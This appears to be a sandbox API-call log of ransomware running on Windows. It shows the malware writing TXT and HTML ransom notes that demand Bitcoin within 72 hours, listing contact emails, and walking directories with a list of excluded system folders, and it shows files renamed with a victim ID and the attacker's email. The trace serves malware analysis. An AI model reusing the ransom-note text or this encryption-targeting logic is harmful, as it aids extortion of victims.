	[0172.102] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*"
	[0172.102] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.102] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.102] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0172.102] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.419] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.419] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.422] CloseHandle (hObject=0x388) returned 1
	[0172.422] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.423] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0172.424] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.424] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.425] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.425] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.425] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0172.425] CloseHandle (hObject=0x388) returned 1
	[0172.426] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.426] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.426] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.426] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0172.427] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.428] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.428] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0172.432] CloseHandle (hObject=0x388) returned 1
	[0172.433] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.433] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.434] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0172.435] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.435] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.435] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.436] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.436] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0172.436] CloseHandle (hObject=0x388) returned 1
	[0172.436] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x801b4ed7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x804d588a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0172.437] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*") returned 84
	[0172.437] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.437] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*") returned 0x54
	[0172.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.437] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="windows") returned 0x0
	[0172.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="boot") returned 0x0
	[0172.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="system volume information") returned 0x0
	[0172.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="temp") returned 0x0
	[0172.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="program files") returned 0x0
	[0172.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="appdata") returned 0x0
	[0172.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="application data") returned 0x0
	[0172.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="winnt") returned 0x0
	[0172.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="tmp") returned 0x0
	[0172.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="cache") returned 0x0
	[0172.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="webcache") returned 0x0
	[0172.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="inetcache") returned 0x0
	[0172.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="nvidia") returned 0x0
	[0172.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="packages") returned 0x0
	[0172.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="cookies") returned 0x0
	[0172.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.443] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*.*", lpSrch="programdata") returned 0x0
	[0172.443] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.444] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x801b4ed7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x804d588a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0172.444] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801681ff, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x801681ff, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x801681ff, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0172.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804d588a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x804d588a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x804fbb91, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804d588a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x804d588a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x804d588a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801b4ed7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x801b4ed7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x801b4ed7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0172.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0172.444] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0172.445] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0172.445] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}"
	[0172.445] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\"
	[0172.445] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov"
	[0172.445] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov"
	[0172.445] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\"
	[0172.445] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\"
	[0172.445] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*"
	[0172.446] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0172.454] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*") returned 89
	[0172.454] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.454] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*") returned 0x59
	[0172.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.454] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0172.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.455] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0172.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.455] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0172.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.455] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.456] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0172.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.456] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0172.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.456] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.457] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0172.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.457] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0172.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.457] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0172.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0172.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0172.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.458] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0172.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
